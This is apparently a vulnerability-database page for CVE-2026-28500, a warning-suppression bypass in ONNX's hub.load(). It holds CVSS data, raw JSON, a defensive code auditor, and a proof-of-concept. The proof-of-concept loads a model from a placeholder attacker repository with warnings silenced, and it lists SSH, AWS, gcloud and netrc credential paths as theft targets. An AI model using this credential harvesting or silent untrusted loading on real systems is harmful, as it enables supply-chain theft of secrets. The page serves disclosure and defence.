Security Vulnerability Report
CVE-2026-28500 CVSS 8.6 HIGH

CVE-2026-28500

Published: 2026-03-18 02:16:24
Last Modified: 2026-03-18 19:48:00

Description

Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:onnx:*:*:*:*:*:*:*:* - VULNERABLE
ONNX <= 1.20.1
onnx.hub.load() with silent parameter in affected versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import inspect
import os

import onnx

# Malicious model construction example (proof of concept).
# An attacker can exploit this vulnerability in the following ways.

# PoC 1: load a malicious model (silent=True bypasses the warning)
try:
    # Attacker-controlled model repository (placeholder value). hub.load()
    # takes a model name and a repo spec, not a URL or local path.
    malicious_repo = "ATTACKER_OWNER/ATTACKER_REPO:main"

    # silent=True completely suppresses the security warning;
    # this is the core of the vulnerability.
    model = onnx.hub.load(
        model="malicious_model",
        repo=malicious_repo,
        silent=True,  # bypasses all security warnings
    )
    print("Model loaded successfully (attack executed)")
except Exception as e:
    print(f"Error: {e}")


# PoC 2: simulate file exfiltration after a malicious model is loaded
def exfiltrate_sensitive_files():
    """
    Simulate an attacker using the vulnerability to steal sensitive files.
    In a real attack these operations would be embedded in the malicious
    ONNX model loading logic.
    """
    sensitive_paths = [
        os.path.expanduser("~/.ssh/id_rsa"),
        os.path.expanduser("~/.ssh/id_ed25519"),
        os.path.expanduser("~/.aws/credentials"),
        os.path.expanduser("~/.config/gcloud/application_default_credentials.json"),
        os.path.expanduser("~/.netrc"),
    ]
    for path in sensitive_paths:
        if os.path.exists(path):
            print(f"[ATTACK] Found sensitive file: {path}")
            # A real attack would read the file contents and send them out


# PoC 3: check whether the vulnerability is present
def check_vulnerability():
    """
    Check whether the installed ONNX version has the silent-parameter bypass.
    """
    load_signature = inspect.signature(onnx.hub.load)
    if "silent" in load_signature.parameters:
        print("[VULN] silent parameter exists - vulnerable to CVE-2026-28500")
        return True
    return False
```
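An added example, not part of the original report or the ONNX project's code: a static audit that finds `hub.load()` call sites where `silent` may suppress the trust warning described above, so they can be reviewed or pinned to a known repo. It assumes that only the hub's default repo `onnx/models` counts as official; `SAMPLE` is constructed input.

```python
import ast

# Assumption for this example: only the default hub repo counts as official.
OFFICIAL_REPOS = {"onnx/models", "onnx/models:main"}
# Positional order in onnx.hub.load(model, repo, opset, force_reload, silent).
REPO_POS, SILENT_POS = 1, 4

# Constructed sample source; it is only parsed, never executed.
SAMPLE = '''
import onnx
from onnx import hub
a = onnx.hub.load("resnet50")
b = hub.load("resnet50", repo="onnx/models:main", silent=True)
c = hub.load("m", repo="someone/models:main", silent=True)
d = hub.load("m", repo=user_repo, silent=quiet)
e = hub.load("m", repo="someone/models:main")
'''


def _is_hub_load(func):
    """True for call targets written as hub.load or onnx.hub.load."""
    if not (isinstance(func, ast.Attribute) and func.attr == "load"):
        return False
    owner = func.value
    name = owner.attr if isinstance(owner, ast.Attribute) else getattr(owner, "id", None)
    return name == "hub"


def _arg(call, name, pos):
    """Return the AST node passed for a parameter, by keyword or by position."""
    for kw in call.keywords:
        if kw.arg == name:
            return kw.value
    return call.args[pos] if len(call.args) > pos else None


def audit_hub_loads(source):
    """Return sorted (line, severity) for calls that may silence the trust prompt."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and _is_hub_load(node.func)):
            continue
        silent = _arg(node, "silent", SILENT_POS)
        # Absent or literal False: the warning and confirmation prompt stay active.
        if silent is None or (isinstance(silent, ast.Constant) and silent.value is False):
            continue
        repo = _arg(node, "repo", REPO_POS)
        # A repo that is not a literal official value cannot be proven trusted.
        official = repo is None or (
            isinstance(repo, ast.Constant) and repo.value in OFFICIAL_REPOS)
        findings.append((node.lineno, "low" if official else "high"))
    return sorted(findings)
```

A "high" finding means the prompt is suppressed for a repo that is not a literal official value; "low" means it is suppressed for the official repo only.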

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28500", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:24.227", "lastModified": "2026-03-18T19:47:59.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available."}, {"lang": "es", "value": "Open Neural Network Exchange (ONNX) es un estándar abierto para la interoperabilidad de aprendizaje automático. En versiones hasta la 1.20.1 inclusive, existe un bypass de control de seguridad en onnx.hub.load() debido a una lógica incorrecta en el mecanismo de verificación de confianza del repositorio. Aunque la función está diseñada para advertir a los usuarios al cargar modelos de fuentes no oficiales, el uso del parámetro silent=True suprime completamente todas las advertencias de seguridad y las solicitudes de confirmación. Esta vulnerabilidad transforma una función estándar de carga de modelos en un vector para ataques de cadena de suministro de interacción cero. 
Cuando se encadena con vulnerabilidades del sistema de archivos, un atacante puede exfiltrar silenciosamente archivos sensibles (claves SSH, credenciales de la nube) de la máquina de la víctima en el momento en que se carga el modelo. Al momento de la publicación, no hay versiones parcheadas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-494"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:onnx:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.20.1", "matchCriteriaId": "34920498-08A0-464E-B9F2-1562D29E3F26"}]}]}], "references": [{"url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m", "source": "[email protected]", "tags": 
["Vendor Advisory"]}, {"url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Patch"]}]}}